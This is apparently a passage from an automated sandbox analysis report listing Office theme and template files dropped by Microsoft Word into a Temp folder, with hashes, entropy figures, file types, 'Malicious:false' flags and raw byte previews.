                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                        MD5:CD465E8DA15E26569897213CA9F6BC9C
                                        SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                        SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                        SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD904C.tmp\Circuit.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):1463634
                                        Entropy (8bit):7.898382456989258
                                        Encrypted:false
                                        SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                        MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                        SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                        SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                        SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Local\Temp\TCD904C.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):280
                                        Entropy (8bit):3.5286004619027067
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                        MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                        SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                        SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                        SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD91C5.tmp\Droplet.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1750795
                                        Entropy (8bit):7.892395931401988
                                        Encrypted:false
                                        SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                        MD5:529795E0B55926752462CBF32C14E738
                                        SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                        SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                        SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Local\Temp\TCD91C5.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):280
                                        Entropy (8bit):3.528155916440219
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                        MD5:AA7B919B21FD42C457948DE1E2988CB3
                                        SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                        SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                        SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD9467.tmp\Slate.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2357051
                                        Entropy (8bit):7.929430745829162
                                        Encrypted:false
                                        SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                        MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                        SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                        SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                        SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Local\Temp\TCD9467.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):3.516423078177173
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                        MD5:5402138088A9CF0993C08A0CA81287B8
                                        SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                        SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                        SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD962E.tmp\Damask.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2218943
                                        Entropy (8bit):7.942378408801199
                                        Encrypted:false
                                        SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                        MD5:EE33FDA08FBF10EF6450B875717F8887
                                        SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                        SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                        SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                        Malicious:false
                                        Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                        C:\Users\user\AppData\Local\Temp\TCD962E.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.544065206514744
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                        MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                        SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                        SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                        SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD98B1.tmp\Main_Event.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2924237
                                        Entropy (8bit):7.970803022812704
                                        Encrypted:false
                                        SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                        MD5:5AF1581E9E055B6E323129E4B07B1A45
                                        SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                        SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                        SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                        Malicious:false
                                        Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                        C:\Users\user\AppData\Local\Temp\TCD98B1.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):286
                                        Entropy (8bit):3.5434534344080606
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                        MD5:C9812793A4E94320C49C7CA054EE6AA4
                                        SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                        SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                        SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD9930.tmp\Mesh.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3078052
                                        Entropy (8bit):7.954129852655753
                                        Encrypted:false
                                        SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                        MD5:CDF98D6B111CF35576343B962EA5EEC6
                                        SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                        SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                        SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                        Malicious:false
                                        Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                        C:\Users\user\AppData\Local\Temp\TCD9930.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):274
                                        Entropy (8bit):3.5303110391598502
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                        MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                        SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                        SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                        SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD9D69.tmp\Vapor_Trail.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:modified
                                        Size (bytes):3611324
                                        Entropy (8bit):7.965784120725206
                                        Encrypted:false
                                        SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                        MD5:FB88BFB743EEA98506536FC44B053BD0
                                        SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                        SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                        SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Local\Temp\TCD9D69.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):288
                                        Entropy (8bit):3.5359188337181853
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                        MD5:0FEA64606C519B78B7A52639FEA11492
                                        SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                        SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                        SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD9DB8.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):274
                                        Entropy (8bit):3.4699940532942914
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                        MD5:55BA5B2974A072B131249FD9FD42EB91
                                        SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                        SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                        SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD9DB8.tmp\Insight design set.dotx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):3465076
                                        Entropy (8bit):7.898517227646252
                                        Encrypted:false
                                        SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                        MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                        SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                        SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                        SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                        Malicious:false
                                        Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                        C:\Users\user\AppData\Local\Temp\cab8812.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):28911
                                        Entropy (8bit):7.7784119983764715
                                        Encrypted:false
                                        SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                        MD5:6D787B1E223DB6B91B69238062CCA872
                                        SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                        SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
